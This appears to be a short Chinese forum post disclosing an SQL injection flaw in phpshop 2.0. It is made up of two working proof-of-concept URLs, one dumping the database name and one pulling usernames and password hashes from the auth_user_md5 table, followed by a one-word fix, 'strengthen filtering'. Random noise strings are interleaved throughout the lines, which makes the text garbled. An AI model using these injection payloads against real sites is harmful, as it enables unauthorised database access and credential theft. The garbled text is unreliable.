标题 : phpshop 2.0 SQL Injection Vulnerability; S! D* Q5 ]- {/ Q
; c2 |/ R4 w# Z4 ?作者 : By onestree
# d' i4 @ C% ^4 W+ i% A1 l5 d下载地址 : http://code.google.com/p/phpshop/downloads/list
, O8 @' i. d" z/ U测试地址: windows 7 / ubuntu
( M: y: o! x$ s4 U; J1 r5 ]7 ^ 5 ?5 P3 A! h' ]0 [$ _# `
, Z% k6 s" E2 t( [
SQLi p0c:& J$ C6 F3 v" t7 q* `$ k; q9 \
; G( N& W9 `+ W9 g/ V) e3 N
==================
! P: G& P8 l/ @. ^ a ) ~! s% a K, S* r& z/ L+ T
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
# e; C3 j9 t) `, sunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --5 u8 i" ~5 l7 s
3 w q, R7 m0 N' W9 n
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--( i4 M- U j0 J {8 d, P/ i
. B8 A" j/ o+ J) f6 n4 U修复:( Y4 U/ u9 H/ ^1 V) y2 y& Z0 P6 J
加强过滤
/ m5 k2 }3 I3 ]: {/ f5 f1 j9 W x `$ s- Q6 Q
2 }2 g" J% F- z# K. v# z
|
发表于 2013-1-18 18:24:10
收藏
支持
反对